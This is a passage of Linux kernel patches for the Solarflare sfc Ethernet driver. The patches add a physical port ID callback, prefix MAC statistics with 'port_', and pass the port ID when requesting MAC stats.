a/drivers/net/ethernet/sfc/efx.c +++ b/drivers/net/ethernet/sfc/efx.c @@ -2282,6 +2282,7 @@ static const struct net_device_ops efx_netdev_ops = { .ndo_set_vf_spoofchk = efx_sriov_set_vf_spoofchk, .ndo_get_vf_config = efx_sriov_get_vf_config, .ndo_set_vf_link_state = efx_sriov_set_vf_link_state, + .ndo_get_phys_port_id = efx_sriov_get_phys_port_id, #endif #ifdef CONFIG_NET_POLL_CONTROLLER .ndo_poll_controller = efx_netpoll, diff --git a/drivers/net/ethernet/sfc/net_driver.h b/drivers/net/ethernet/sfc/net_driver.h index a468a22e7a88..d72f522bf9c3 100644 --- a/drivers/net/ethernet/sfc/net_driver.h +++ b/drivers/net/ethernet/sfc/net_driver.h @@ -1350,6 +1350,8 @@ struct efx_nic_type { struct 
ifla_vf_info *ivi); int (*sriov_set_vf_link_state)(struct efx_nic *efx, int vf_i, int link_state); + int (*sriov_get_phys_port_id)(struct efx_nic *efx, + struct netdev_phys_item_id *ppid); int (*vswitching_probe)(struct efx_nic *efx); int (*vswitching_restore)(struct efx_nic *efx); void (*vswitching_remove)(struct efx_nic *efx); diff --git a/drivers/net/ethernet/sfc/nic.h b/drivers/net/ethernet/sfc/nic.h index db8562ec586d..e146e30780a1 100644 --- a/drivers/net/ethernet/sfc/nic.h +++ b/drivers/net/ethernet/sfc/nic.h @@ -524,6 +524,7 @@ struct efx_ef10_nic_data { unsigned int vport_id; bool must_probe_vswitching; unsigned int pf_index; + u8 port_id[ETH_ALEN]; #ifdef CONFIG_SFC_SRIOV unsigned int vf_index; struct ef10_vf *vf; diff --git a/drivers/net/ethernet/sfc/sriov.c b/drivers/net/ethernet/sfc/sriov.c index 6c5edbdbfa27..816c44689e67 100644 --- a/drivers/net/ethernet/sfc/sriov.c +++ b/drivers/net/ethernet/sfc/sriov.c @@ -70,3 +70,14 @@ int efx_sriov_set_vf_link_state(struct net_device *net_dev, int vf_i, else return -EOPNOTSUPP; } + +int efx_sriov_get_phys_port_id(struct net_device *net_dev, + struct netdev_phys_item_id *ppid) +{ + struct efx_nic *efx = netdev_priv(net_dev); + + if (efx->type->sriov_get_phys_port_id) + return efx->type->sriov_get_phys_port_id(efx, ppid); + else + return -EOPNOTSUPP; +} diff --git a/drivers/net/ethernet/sfc/sriov.h b/drivers/net/ethernet/sfc/sriov.h index 3be15a54c562..400df526586d 100644 --- a/drivers/net/ethernet/sfc/sriov.h +++ b/drivers/net/ethernet/sfc/sriov.h @@ -23,6 +23,8 @@ int efx_sriov_get_vf_config(struct net_device *net_dev, int vf_i, struct ifla_vf_info *ivi); int efx_sriov_set_vf_link_state(struct net_device *net_dev, int vf_i, int link_state); +int efx_sriov_get_phys_port_id(struct net_device *net_dev, + struct netdev_phys_item_id *ppid); #endif /* CONFIG_SFC_SRIOV */ From e80ca0139929a37a8d2b7fc90625aa5107066f57 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:38:34 +0100 Subject: [PATCH 604/872] sfc: add "port_" prefix to MAC stats The MAC stats are per-port and will only be displayed on the PF with control of the link (one per physical port). Vadapter stats will also be displayed for this PF, so distinguish the MAC stats by adding a prefix of "port_". Signed-off-by: Shradha Shah Signed-off-by: David S. 
Miller --- drivers/net/ethernet/sfc/ef10.c | 251 ++++++++++++++------------- drivers/net/ethernet/sfc/mcdi_pcol.h | 4 +- drivers/net/ethernet/sfc/nic.h | 106 +++++------ 3 files changed, 182 insertions(+), 179 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 22c5dc3ba43b..f44a56a68f3a 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -991,93 +991,94 @@ static int efx_ef10_reset(struct efx_nic *efx, enum reset_type reset_type) [GENERIC_STAT_ ## ext_name] = { #ext_name, 0, 0 } static const struct efx_hw_stat_desc efx_ef10_stat_desc[EF10_STAT_COUNT] = { - EF10_DMA_STAT(tx_bytes, TX_BYTES), - EF10_DMA_STAT(tx_packets, TX_PKTS), - EF10_DMA_STAT(tx_pause, TX_PAUSE_PKTS), - EF10_DMA_STAT(tx_control, TX_CONTROL_PKTS), - EF10_DMA_STAT(tx_unicast, TX_UNICAST_PKTS), - EF10_DMA_STAT(tx_multicast, TX_MULTICAST_PKTS), - EF10_DMA_STAT(tx_broadcast, TX_BROADCAST_PKTS), - EF10_DMA_STAT(tx_lt64, TX_LT64_PKTS), - EF10_DMA_STAT(tx_64, TX_64_PKTS), - EF10_DMA_STAT(tx_65_to_127, TX_65_TO_127_PKTS), - EF10_DMA_STAT(tx_128_to_255, TX_128_TO_255_PKTS), - EF10_DMA_STAT(tx_256_to_511, TX_256_TO_511_PKTS), - EF10_DMA_STAT(tx_512_to_1023, TX_512_TO_1023_PKTS), - EF10_DMA_STAT(tx_1024_to_15xx, TX_1024_TO_15XX_PKTS), - EF10_DMA_STAT(tx_15xx_to_jumbo, TX_15XX_TO_JUMBO_PKTS), - EF10_DMA_STAT(rx_bytes, RX_BYTES), - EF10_DMA_INVIS_STAT(rx_bytes_minus_good_bytes, RX_BAD_BYTES), - EF10_OTHER_STAT(rx_good_bytes), - EF10_OTHER_STAT(rx_bad_bytes), - EF10_DMA_STAT(rx_packets, RX_PKTS), - EF10_DMA_STAT(rx_good, RX_GOOD_PKTS), - EF10_DMA_STAT(rx_bad, RX_BAD_FCS_PKTS), - EF10_DMA_STAT(rx_pause, RX_PAUSE_PKTS), - EF10_DMA_STAT(rx_control, RX_CONTROL_PKTS), - EF10_DMA_STAT(rx_unicast, RX_UNICAST_PKTS), - EF10_DMA_STAT(rx_multicast, RX_MULTICAST_PKTS), - EF10_DMA_STAT(rx_broadcast, RX_BROADCAST_PKTS), - EF10_DMA_STAT(rx_lt64, RX_UNDERSIZE_PKTS), - EF10_DMA_STAT(rx_64, RX_64_PKTS), - EF10_DMA_STAT(rx_65_to_127, RX_65_TO_127_PKTS), - EF10_DMA_STAT(rx_128_to_255, RX_128_TO_255_PKTS), - EF10_DMA_STAT(rx_256_to_511, RX_256_TO_511_PKTS), - EF10_DMA_STAT(rx_512_to_1023, RX_512_TO_1023_PKTS), - EF10_DMA_STAT(rx_1024_to_15xx, RX_1024_TO_15XX_PKTS), - EF10_DMA_STAT(rx_15xx_to_jumbo, RX_15XX_TO_JUMBO_PKTS), - EF10_DMA_STAT(rx_gtjumbo, RX_GTJUMBO_PKTS), - EF10_DMA_STAT(rx_bad_gtjumbo, RX_JABBER_PKTS), - EF10_DMA_STAT(rx_overflow, RX_OVERFLOW_PKTS), - EF10_DMA_STAT(rx_align_error, RX_ALIGN_ERROR_PKTS), - EF10_DMA_STAT(rx_length_error, RX_LENGTH_ERROR_PKTS), - EF10_DMA_STAT(rx_nodesc_drops, RX_NODESC_DROPS), + EF10_DMA_STAT(port_tx_bytes, TX_BYTES), + EF10_DMA_STAT(port_tx_packets, TX_PKTS), + EF10_DMA_STAT(port_tx_pause, TX_PAUSE_PKTS), + EF10_DMA_STAT(port_tx_control, TX_CONTROL_PKTS), + EF10_DMA_STAT(port_tx_unicast, TX_UNICAST_PKTS), + EF10_DMA_STAT(port_tx_multicast, TX_MULTICAST_PKTS), + EF10_DMA_STAT(port_tx_broadcast, TX_BROADCAST_PKTS), + EF10_DMA_STAT(port_tx_lt64, TX_LT64_PKTS), + EF10_DMA_STAT(port_tx_64, TX_64_PKTS), + EF10_DMA_STAT(port_tx_65_to_127, TX_65_TO_127_PKTS), + EF10_DMA_STAT(port_tx_128_to_255, TX_128_TO_255_PKTS), + EF10_DMA_STAT(port_tx_256_to_511, TX_256_TO_511_PKTS), + EF10_DMA_STAT(port_tx_512_to_1023, TX_512_TO_1023_PKTS), + EF10_DMA_STAT(port_tx_1024_to_15xx, TX_1024_TO_15XX_PKTS), + EF10_DMA_STAT(port_tx_15xx_to_jumbo, TX_15XX_TO_JUMBO_PKTS), + EF10_DMA_STAT(port_rx_bytes, RX_BYTES), + EF10_DMA_INVIS_STAT(port_rx_bytes_minus_good_bytes, RX_BAD_BYTES), + EF10_OTHER_STAT(port_rx_good_bytes), + EF10_OTHER_STAT(port_rx_bad_bytes), + 
EF10_DMA_STAT(port_rx_packets, RX_PKTS), + EF10_DMA_STAT(port_rx_good, RX_GOOD_PKTS), + EF10_DMA_STAT(port_rx_bad, RX_BAD_FCS_PKTS), + EF10_DMA_STAT(port_rx_pause, RX_PAUSE_PKTS), + EF10_DMA_STAT(port_rx_control, RX_CONTROL_PKTS), + EF10_DMA_STAT(port_rx_unicast, RX_UNICAST_PKTS), + EF10_DMA_STAT(port_rx_multicast, RX_MULTICAST_PKTS), + EF10_DMA_STAT(port_rx_broadcast, RX_BROADCAST_PKTS), + EF10_DMA_STAT(port_rx_lt64, RX_UNDERSIZE_PKTS), + EF10_DMA_STAT(port_rx_64, RX_64_PKTS), + EF10_DMA_STAT(port_rx_65_to_127, RX_65_TO_127_PKTS), + EF10_DMA_STAT(port_rx_128_to_255, RX_128_TO_255_PKTS), + EF10_DMA_STAT(port_rx_256_to_511, RX_256_TO_511_PKTS), + EF10_DMA_STAT(port_rx_512_to_1023, RX_512_TO_1023_PKTS), + EF10_DMA_STAT(port_rx_1024_to_15xx, RX_1024_TO_15XX_PKTS), + EF10_DMA_STAT(port_rx_15xx_to_jumbo, RX_15XX_TO_JUMBO_PKTS), + EF10_DMA_STAT(port_rx_gtjumbo, RX_GTJUMBO_PKTS), + EF10_DMA_STAT(port_rx_bad_gtjumbo, RX_JABBER_PKTS), + EF10_DMA_STAT(port_rx_overflow, RX_OVERFLOW_PKTS), + EF10_DMA_STAT(port_rx_align_error, RX_ALIGN_ERROR_PKTS), + EF10_DMA_STAT(port_rx_length_error, RX_LENGTH_ERROR_PKTS), + EF10_DMA_STAT(port_rx_nodesc_drops, RX_NODESC_DROPS), GENERIC_SW_STAT(rx_nodesc_trunc), GENERIC_SW_STAT(rx_noskb_drops), - EF10_DMA_STAT(rx_pm_trunc_bb_overflow, PM_TRUNC_BB_OVERFLOW), - EF10_DMA_STAT(rx_pm_discard_bb_overflow, PM_DISCARD_BB_OVERFLOW), - EF10_DMA_STAT(rx_pm_trunc_vfifo_full, PM_TRUNC_VFIFO_FULL), - EF10_DMA_STAT(rx_pm_discard_vfifo_full, PM_DISCARD_VFIFO_FULL), - EF10_DMA_STAT(rx_pm_trunc_qbb, PM_TRUNC_QBB), - EF10_DMA_STAT(rx_pm_discard_qbb, PM_DISCARD_QBB), - EF10_DMA_STAT(rx_pm_discard_mapping, PM_DISCARD_MAPPING), - EF10_DMA_STAT(rx_dp_q_disabled_packets, RXDP_Q_DISABLED_PKTS), - EF10_DMA_STAT(rx_dp_di_dropped_packets, RXDP_DI_DROPPED_PKTS), - EF10_DMA_STAT(rx_dp_streaming_packets, RXDP_STREAMING_PKTS), - EF10_DMA_STAT(rx_dp_hlb_fetch, RXDP_EMERGENCY_FETCH_CONDITIONS), - EF10_DMA_STAT(rx_dp_hlb_wait, RXDP_EMERGENCY_WAIT_CONDITIONS), + EF10_DMA_STAT(port_rx_pm_trunc_bb_overflow, PM_TRUNC_BB_OVERFLOW), + EF10_DMA_STAT(port_rx_pm_discard_bb_overflow, PM_DISCARD_BB_OVERFLOW), + EF10_DMA_STAT(port_rx_pm_trunc_vfifo_full, PM_TRUNC_VFIFO_FULL), + EF10_DMA_STAT(port_rx_pm_discard_vfifo_full, PM_DISCARD_VFIFO_FULL), + EF10_DMA_STAT(port_rx_pm_trunc_qbb, PM_TRUNC_QBB), + EF10_DMA_STAT(port_rx_pm_discard_qbb, PM_DISCARD_QBB), + EF10_DMA_STAT(port_rx_pm_discard_mapping, PM_DISCARD_MAPPING), + EF10_DMA_STAT(port_rx_dp_q_disabled_packets, RXDP_Q_DISABLED_PKTS), + EF10_DMA_STAT(port_rx_dp_di_dropped_packets, RXDP_DI_DROPPED_PKTS), + EF10_DMA_STAT(port_rx_dp_streaming_packets, RXDP_STREAMING_PKTS), + EF10_DMA_STAT(port_rx_dp_hlb_fetch, RXDP_HLB_FETCH_CONDITIONS), + EF10_DMA_STAT(port_rx_dp_hlb_wait, RXDP_HLB_WAIT_CONDITIONS), }; -#define HUNT_COMMON_STAT_MASK ((1ULL << EF10_STAT_tx_bytes) | \ - (1ULL << EF10_STAT_tx_packets) | \ - (1ULL << EF10_STAT_tx_pause) | \ - (1ULL << EF10_STAT_tx_unicast) | \ - (1ULL << EF10_STAT_tx_multicast) | \ - (1ULL << EF10_STAT_tx_broadcast) | \ - (1ULL << EF10_STAT_rx_bytes) | \ - (1ULL << EF10_STAT_rx_bytes_minus_good_bytes) | \ - (1ULL << EF10_STAT_rx_good_bytes) | \ - (1ULL << EF10_STAT_rx_bad_bytes) | \ - (1ULL << EF10_STAT_rx_packets) | \ - (1ULL << EF10_STAT_rx_good) | \ - (1ULL << EF10_STAT_rx_bad) | \ - (1ULL << EF10_STAT_rx_pause) | \ - (1ULL << EF10_STAT_rx_control) | \ - (1ULL << EF10_STAT_rx_unicast) | \ - (1ULL << EF10_STAT_rx_multicast) | \ - (1ULL << EF10_STAT_rx_broadcast) | \ - (1ULL << EF10_STAT_rx_lt64) | \ - (1ULL << EF10_STAT_rx_64) | \ - 
(1ULL << EF10_STAT_rx_65_to_127) | \ - (1ULL << EF10_STAT_rx_128_to_255) | \ - (1ULL << EF10_STAT_rx_256_to_511) | \ - (1ULL << EF10_STAT_rx_512_to_1023) | \ - (1ULL << EF10_STAT_rx_1024_to_15xx) | \ - (1ULL << EF10_STAT_rx_15xx_to_jumbo) | \ - (1ULL << EF10_STAT_rx_gtjumbo) | \ - (1ULL << EF10_STAT_rx_bad_gtjumbo) | \ - (1ULL << EF10_STAT_rx_overflow) | \ - (1ULL << EF10_STAT_rx_nodesc_drops) | \ +#define HUNT_COMMON_STAT_MASK ((1ULL << EF10_STAT_port_tx_bytes) | \ + (1ULL << EF10_STAT_port_tx_packets) | \ + (1ULL << EF10_STAT_port_tx_pause) | \ + (1ULL << EF10_STAT_port_tx_unicast) | \ + (1ULL << EF10_STAT_port_tx_multicast) | \ + (1ULL << EF10_STAT_port_tx_broadcast) | \ + (1ULL << EF10_STAT_port_rx_bytes) | \ + (1ULL << \ + EF10_STAT_port_rx_bytes_minus_good_bytes) | \ + (1ULL << EF10_STAT_port_rx_good_bytes) | \ + (1ULL << EF10_STAT_port_rx_bad_bytes) | \ + (1ULL << EF10_STAT_port_rx_packets) | \ + (1ULL << EF10_STAT_port_rx_good) | \ + (1ULL << EF10_STAT_port_rx_bad) | \ + (1ULL << EF10_STAT_port_rx_pause) | \ + (1ULL << EF10_STAT_port_rx_control) | \ + (1ULL << EF10_STAT_port_rx_unicast) | \ + (1ULL << EF10_STAT_port_rx_multicast) | \ + (1ULL << EF10_STAT_port_rx_broadcast) | \ + (1ULL << EF10_STAT_port_rx_lt64) | \ + (1ULL << EF10_STAT_port_rx_64) | \ + (1ULL << EF10_STAT_port_rx_65_to_127) | \ + (1ULL << EF10_STAT_port_rx_128_to_255) | \ + (1ULL << EF10_STAT_port_rx_256_to_511) | \ + (1ULL << EF10_STAT_port_rx_512_to_1023) |\ + (1ULL << EF10_STAT_port_rx_1024_to_15xx) |\ + (1ULL << EF10_STAT_port_rx_15xx_to_jumbo) |\ + (1ULL << EF10_STAT_port_rx_gtjumbo) | \ + (1ULL << EF10_STAT_port_rx_bad_gtjumbo) |\ + (1ULL << EF10_STAT_port_rx_overflow) | \ + (1ULL << EF10_STAT_port_rx_nodesc_drops) |\ (1ULL << GENERIC_STAT_rx_nodesc_trunc) | \ (1ULL << GENERIC_STAT_rx_noskb_drops)) @@ -1085,39 +1086,39 @@ static const struct efx_hw_stat_desc efx_ef10_stat_desc[EF10_STAT_COUNT] = { * switchable port we do not expose these because they might not * include all the packets they should. */ -#define HUNT_10G_ONLY_STAT_MASK ((1ULL << EF10_STAT_tx_control) | \ - (1ULL << EF10_STAT_tx_lt64) | \ - (1ULL << EF10_STAT_tx_64) | \ - (1ULL << EF10_STAT_tx_65_to_127) | \ - (1ULL << EF10_STAT_tx_128_to_255) | \ - (1ULL << EF10_STAT_tx_256_to_511) | \ - (1ULL << EF10_STAT_tx_512_to_1023) | \ - (1ULL << EF10_STAT_tx_1024_to_15xx) | \ - (1ULL << EF10_STAT_tx_15xx_to_jumbo)) +#define HUNT_10G_ONLY_STAT_MASK ((1ULL << EF10_STAT_port_tx_control) | \ + (1ULL << EF10_STAT_port_tx_lt64) | \ + (1ULL << EF10_STAT_port_tx_64) | \ + (1ULL << EF10_STAT_port_tx_65_to_127) |\ + (1ULL << EF10_STAT_port_tx_128_to_255) |\ + (1ULL << EF10_STAT_port_tx_256_to_511) |\ + (1ULL << EF10_STAT_port_tx_512_to_1023) |\ + (1ULL << EF10_STAT_port_tx_1024_to_15xx) |\ + (1ULL << EF10_STAT_port_tx_15xx_to_jumbo)) /* These statistics are only provided by the 40G MAC. For a 10G/40G * switchable port we do expose these because the errors will otherwise * be silent. */ -#define HUNT_40G_EXTRA_STAT_MASK ((1ULL << EF10_STAT_rx_align_error) | \ - (1ULL << EF10_STAT_rx_length_error)) +#define HUNT_40G_EXTRA_STAT_MASK ((1ULL << EF10_STAT_port_rx_align_error) |\ + (1ULL << EF10_STAT_port_rx_length_error)) /* These statistics are only provided if the firmware supports the * capability PM_AND_RXDP_COUNTERS. 
*/ #define HUNT_PM_AND_RXDP_STAT_MASK ( \ - (1ULL << EF10_STAT_rx_pm_trunc_bb_overflow) | \ - (1ULL << EF10_STAT_rx_pm_discard_bb_overflow) | \ - (1ULL << EF10_STAT_rx_pm_trunc_vfifo_full) | \ - (1ULL << EF10_STAT_rx_pm_discard_vfifo_full) | \ - (1ULL << EF10_STAT_rx_pm_trunc_qbb) | \ - (1ULL << EF10_STAT_rx_pm_discard_qbb) | \ - (1ULL << EF10_STAT_rx_pm_discard_mapping) | \ - (1ULL << EF10_STAT_rx_dp_q_disabled_packets) | \ - (1ULL << EF10_STAT_rx_dp_di_dropped_packets) | \ - (1ULL << EF10_STAT_rx_dp_streaming_packets) | \ - (1ULL << EF10_STAT_rx_dp_hlb_fetch) | \ - (1ULL << EF10_STAT_rx_dp_hlb_wait)) + (1ULL << EF10_STAT_port_rx_pm_trunc_bb_overflow) | \ + (1ULL << EF10_STAT_port_rx_pm_discard_bb_overflow) | \ + (1ULL << EF10_STAT_port_rx_pm_trunc_vfifo_full) | \ + (1ULL << EF10_STAT_port_rx_pm_discard_vfifo_full) | \ + (1ULL << EF10_STAT_port_rx_pm_trunc_qbb) | \ + (1ULL << EF10_STAT_port_rx_pm_discard_qbb) | \ + (1ULL << EF10_STAT_port_rx_pm_discard_mapping) | \ + (1ULL << EF10_STAT_port_rx_dp_q_disabled_packets) | \ + (1ULL << EF10_STAT_port_rx_dp_di_dropped_packets) | \ + (1ULL << EF10_STAT_port_rx_dp_streaming_packets) | \ + (1ULL << EF10_STAT_port_rx_dp_hlb_fetch) | \ + (1ULL << EF10_STAT_port_rx_dp_hlb_wait)) static u64 efx_ef10_raw_stat_mask(struct efx_nic *efx) { @@ -1183,12 +1184,13 @@ static int efx_ef10_try_update_nic_stats(struct efx_nic *efx) return -EAGAIN; /* Update derived statistics */ - efx_nic_fix_nodesc_drop_stat(efx, &stats[EF10_STAT_rx_nodesc_drops]); - stats[EF10_STAT_rx_good_bytes] = - stats[EF10_STAT_rx_bytes] - - stats[EF10_STAT_rx_bytes_minus_good_bytes]; - efx_update_diff_stat(&stats[EF10_STAT_rx_bad_bytes], - stats[EF10_STAT_rx_bytes_minus_good_bytes]); + efx_nic_fix_nodesc_drop_stat(efx, + &stats[EF10_STAT_port_rx_nodesc_drops]); + stats[EF10_STAT_port_rx_good_bytes] = + stats[EF10_STAT_port_rx_bytes] - + stats[EF10_STAT_port_rx_bytes_minus_good_bytes]; + efx_update_diff_stat(&stats[EF10_STAT_port_rx_bad_bytes], + stats[EF10_STAT_port_rx_bytes_minus_good_bytes]); efx_update_sw_stats(efx, stats); return 0; } @@ -1224,20 +1226,21 @@ static size_t efx_ef10_update_stats(struct efx_nic *efx, u64 *full_stats, } if (core_stats) { - core_stats->rx_packets = stats[EF10_STAT_rx_packets]; - core_stats->tx_packets = stats[EF10_STAT_tx_packets]; - core_stats->rx_bytes = stats[EF10_STAT_rx_bytes]; - core_stats->tx_bytes = stats[EF10_STAT_tx_bytes]; - core_stats->rx_dropped = stats[EF10_STAT_rx_nodesc_drops] + + core_stats->rx_packets = stats[EF10_STAT_port_rx_packets]; + core_stats->tx_packets = stats[EF10_STAT_port_tx_packets]; + core_stats->rx_bytes = stats[EF10_STAT_port_rx_bytes]; + core_stats->tx_bytes = stats[EF10_STAT_port_tx_bytes]; + core_stats->rx_dropped = stats[EF10_STAT_port_rx_nodesc_drops] + stats[GENERIC_STAT_rx_nodesc_trunc] + stats[GENERIC_STAT_rx_noskb_drops]; - core_stats->multicast = stats[EF10_STAT_rx_multicast]; + core_stats->multicast = stats[EF10_STAT_port_rx_multicast]; core_stats->rx_length_errors = - stats[EF10_STAT_rx_gtjumbo] + - stats[EF10_STAT_rx_length_error]; - core_stats->rx_crc_errors = stats[EF10_STAT_rx_bad]; - core_stats->rx_frame_errors = stats[EF10_STAT_rx_align_error]; - core_stats->rx_fifo_errors = stats[EF10_STAT_rx_overflow]; + stats[EF10_STAT_port_rx_gtjumbo] + + stats[EF10_STAT_port_rx_length_error]; + core_stats->rx_crc_errors = stats[EF10_STAT_port_rx_bad]; + core_stats->rx_frame_errors = + stats[EF10_STAT_port_rx_align_error]; + core_stats->rx_fifo_errors = stats[EF10_STAT_port_rx_overflow]; core_stats->rx_errors = 
(core_stats->rx_length_errors + core_stats->rx_crc_errors + core_stats->rx_frame_errors); @@ -1372,7 +1375,7 @@ static int efx_ef10_mcdi_poll_reboot(struct efx_nic *efx) /* MAC statistics have been cleared on the NIC; clear the local * statistic that we update with efx_update_diff_stat(). */ - nic_data->stats[EF10_STAT_rx_bad_bytes] = 0; + nic_data->stats[EF10_STAT_port_rx_bad_bytes] = 0; return -EIO; } diff --git a/drivers/net/ethernet/sfc/mcdi_pcol.h b/drivers/net/ethernet/sfc/mcdi_pcol.h index 9efdf0a5df64..1e11bb8a95a3 100644 --- a/drivers/net/ethernet/sfc/mcdi_pcol.h +++ b/drivers/net/ethernet/sfc/mcdi_pcol.h @@ -2891,11 +2891,11 @@ /* enum: RXDP counter: Number of times an emergency descriptor fetch was * performed. Valid for EF10 with PM_AND_RXDP_COUNTERS capability only. */ -#define MC_CMD_MAC_RXDP_EMERGENCY_FETCH_CONDITIONS 0x47 +#define MC_CMD_MAC_RXDP_HLB_FETCH_CONDITIONS 0x47 /* enum: RXDP counter: Number of times the DPCPU waited for an existing * descriptor fetch. Valid for EF10 with PM_AND_RXDP_COUNTERS capability only. */ -#define MC_CMD_MAC_RXDP_EMERGENCY_WAIT_CONDITIONS 0x48 +#define MC_CMD_MAC_RXDP_HLB_WAIT_CONDITIONS 0x48 /* enum: Start of GMAC stats buffer space, for Siena only. */ #define MC_CMD_GMAC_DMABUF_START 0x40 /* enum: End of GMAC stats buffer space, for Siena only. */ diff --git a/drivers/net/ethernet/sfc/nic.h b/drivers/net/ethernet/sfc/nic.h index e146e30780a1..8b69a31a0ee4 100644 --- a/drivers/net/ethernet/sfc/nic.h +++ b/drivers/net/ethernet/sfc/nic.h @@ -407,59 +407,59 @@ struct siena_nic_data { }; enum { - EF10_STAT_tx_bytes = GENERIC_STAT_COUNT, - EF10_STAT_tx_packets, - EF10_STAT_tx_pause, - EF10_STAT_tx_control, - EF10_STAT_tx_unicast, - EF10_STAT_tx_multicast, - EF10_STAT_tx_broadcast, - EF10_STAT_tx_lt64, - EF10_STAT_tx_64, - EF10_STAT_tx_65_to_127, - EF10_STAT_tx_128_to_255, - EF10_STAT_tx_256_to_511, - EF10_STAT_tx_512_to_1023, - EF10_STAT_tx_1024_to_15xx, - EF10_STAT_tx_15xx_to_jumbo, - EF10_STAT_rx_bytes, - EF10_STAT_rx_bytes_minus_good_bytes, - EF10_STAT_rx_good_bytes, - EF10_STAT_rx_bad_bytes, - EF10_STAT_rx_packets, - EF10_STAT_rx_good, - EF10_STAT_rx_bad, - EF10_STAT_rx_pause, - EF10_STAT_rx_control, - EF10_STAT_rx_unicast, - EF10_STAT_rx_multicast, - EF10_STAT_rx_broadcast, - EF10_STAT_rx_lt64, - EF10_STAT_rx_64, - EF10_STAT_rx_65_to_127, - EF10_STAT_rx_128_to_255, - EF10_STAT_rx_256_to_511, - EF10_STAT_rx_512_to_1023, - EF10_STAT_rx_1024_to_15xx, - EF10_STAT_rx_15xx_to_jumbo, - EF10_STAT_rx_gtjumbo, - EF10_STAT_rx_bad_gtjumbo, - EF10_STAT_rx_overflow, - EF10_STAT_rx_align_error, - EF10_STAT_rx_length_error, - EF10_STAT_rx_nodesc_drops, - EF10_STAT_rx_pm_trunc_bb_overflow, - EF10_STAT_rx_pm_discard_bb_overflow, - EF10_STAT_rx_pm_trunc_vfifo_full, - EF10_STAT_rx_pm_discard_vfifo_full, - EF10_STAT_rx_pm_trunc_qbb, - EF10_STAT_rx_pm_discard_qbb, - EF10_STAT_rx_pm_discard_mapping, - EF10_STAT_rx_dp_q_disabled_packets, - EF10_STAT_rx_dp_di_dropped_packets, - EF10_STAT_rx_dp_streaming_packets, - EF10_STAT_rx_dp_hlb_fetch, - EF10_STAT_rx_dp_hlb_wait, + EF10_STAT_port_tx_bytes = GENERIC_STAT_COUNT, + EF10_STAT_port_tx_packets, + EF10_STAT_port_tx_pause, + EF10_STAT_port_tx_control, + EF10_STAT_port_tx_unicast, + EF10_STAT_port_tx_multicast, + EF10_STAT_port_tx_broadcast, + EF10_STAT_port_tx_lt64, + EF10_STAT_port_tx_64, + EF10_STAT_port_tx_65_to_127, + EF10_STAT_port_tx_128_to_255, + EF10_STAT_port_tx_256_to_511, + EF10_STAT_port_tx_512_to_1023, + EF10_STAT_port_tx_1024_to_15xx, + EF10_STAT_port_tx_15xx_to_jumbo, + EF10_STAT_port_rx_bytes, + 
EF10_STAT_port_rx_bytes_minus_good_bytes, + EF10_STAT_port_rx_good_bytes, + EF10_STAT_port_rx_bad_bytes, + EF10_STAT_port_rx_packets, + EF10_STAT_port_rx_good, + EF10_STAT_port_rx_bad, + EF10_STAT_port_rx_pause, + EF10_STAT_port_rx_control, + EF10_STAT_port_rx_unicast, + EF10_STAT_port_rx_multicast, + EF10_STAT_port_rx_broadcast, + EF10_STAT_port_rx_lt64, + EF10_STAT_port_rx_64, + EF10_STAT_port_rx_65_to_127, + EF10_STAT_port_rx_128_to_255, + EF10_STAT_port_rx_256_to_511, + EF10_STAT_port_rx_512_to_1023, + EF10_STAT_port_rx_1024_to_15xx, + EF10_STAT_port_rx_15xx_to_jumbo, + EF10_STAT_port_rx_gtjumbo, + EF10_STAT_port_rx_bad_gtjumbo, + EF10_STAT_port_rx_overflow, + EF10_STAT_port_rx_align_error, + EF10_STAT_port_rx_length_error, + EF10_STAT_port_rx_nodesc_drops, + EF10_STAT_port_rx_pm_trunc_bb_overflow, + EF10_STAT_port_rx_pm_discard_bb_overflow, + EF10_STAT_port_rx_pm_trunc_vfifo_full, + EF10_STAT_port_rx_pm_discard_vfifo_full, + EF10_STAT_port_rx_pm_trunc_qbb, + EF10_STAT_port_rx_pm_discard_qbb, + EF10_STAT_port_rx_pm_discard_mapping, + EF10_STAT_port_rx_dp_q_disabled_packets, + EF10_STAT_port_rx_dp_di_dropped_packets, + EF10_STAT_port_rx_dp_streaming_packets, + EF10_STAT_port_rx_dp_hlb_fetch, + EF10_STAT_port_rx_dp_hlb_wait, EF10_STAT_COUNT }; From 0a2ab4d988d75a42f3997343d1f0a767b9fdec3d Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:38:49 +0100 Subject: [PATCH 605/872] sfc: set the port-id when calling MC_CMD_MAC_STATS The port-id must be known so that the RMON level can be set for the collection of vadapter stats. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/mcdi_port.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/ethernet/sfc/mcdi_port.c b/drivers/net/ethernet/sfc/mcdi_port.c index 9bf04cbce20a..fffc34888c02 100644 --- a/drivers/net/ethernet/sfc/mcdi_port.c +++ b/drivers/net/ethernet/sfc/mcdi_port.c @@ -924,6 +924,7 @@ enum efx_stats_action { static int efx_mcdi_mac_stats(struct efx_nic *efx, enum efx_stats_action action, int clear) { + struct efx_ef10_nic_data *nic_data = efx->nic_data; MCDI_DECLARE_BUF(inbuf, MC_CMD_MAC_STATS_IN_LEN); int rc; int change = action == EFX_STATS_PULL ? 0 : 1; @@ -945,6 +946,7 @@ static int efx_mcdi_mac_stats(struct efx_nic *efx, MAC_STATS_IN_PERIODIC_NOEVENT, 1, MAC_STATS_IN_PERIOD_MS, period); MCDI_SET_DWORD(inbuf, MAC_STATS_IN_DMA_LEN, dma_len); + MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, nic_data->vport_id); rc = efx_mcdi_rpc(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), NULL, 0, NULL); From 3c36a2aded8c9ef06bd09183bd6905f6b55f9886 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:39:06 +0100 Subject: [PATCH 606/872] sfc: display vadaptor statistics for all interfaces All interfaces will display vadaptor statistics, so set all the relevant bits in the stats bitmask. Only functions with the LINKCTRL flag will see other stats, including (per-port) MAC stats. The vadaptor stats are from rx_unicast to tx_overflow. Signed-off-by: Shradha Shah Signed-off-by: David 